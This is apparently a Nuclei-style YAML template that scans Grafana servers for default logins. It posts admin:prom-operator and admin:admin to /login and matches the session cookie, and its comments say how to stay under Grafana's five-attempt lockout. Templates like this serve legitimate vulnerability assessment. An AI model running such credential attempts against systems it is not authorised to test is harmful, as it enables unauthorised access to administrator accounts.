id: grafana-default-credential
info:
  name: Grafana Default Credentials Check
  author: pdteam
  severity: high

requests:

    # https://grafana.com/docs/grafana/latest/administration/configuration/#disable_brute_force_login_protection
    # https://github.com/grafana/grafana/issues/14755
    # Grafana blocks for 5 minutes after 5 "Invalid" attempts for valid user.
    # So make sure, not to attempt more than 4 password for same valid user.

  - payloads:

    # grafana_username:
    #  - admin

      grafana_password:
        - prom-operator
        - admin

    # Added default grafana and prometheus user.
    # Source:- https://stackoverflow.com/questions/54039604/what-is-the-default-username-and-password-for-grafana-login-page

    attack: sniper

    # Available types: sniper, pitchfork and clusterbomb

    raw:
      - |
        POST /login HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
        Accept: application/json, text/plain, */*
        Accept-Language: en-US,en;q=0.5
        Referer: {{BaseURL}}
        content-type: application/json
        Connection: close

        {"user":"admin","password":"grafana_password"}

     # grafana_password will be replaced with payloads and will attempt admin:prom-operator and admin:admin

    matchers-condition: and
    matchers:
      - type: word
        words:
          - grafana_session
        part: header
        # Check for 'grafana_session' cookie on valid login in the response header.

      - type: word
        words:
          - Logged in
        part: body
        # Check for valid string on valid login.

      - type: status
        status:
          - 200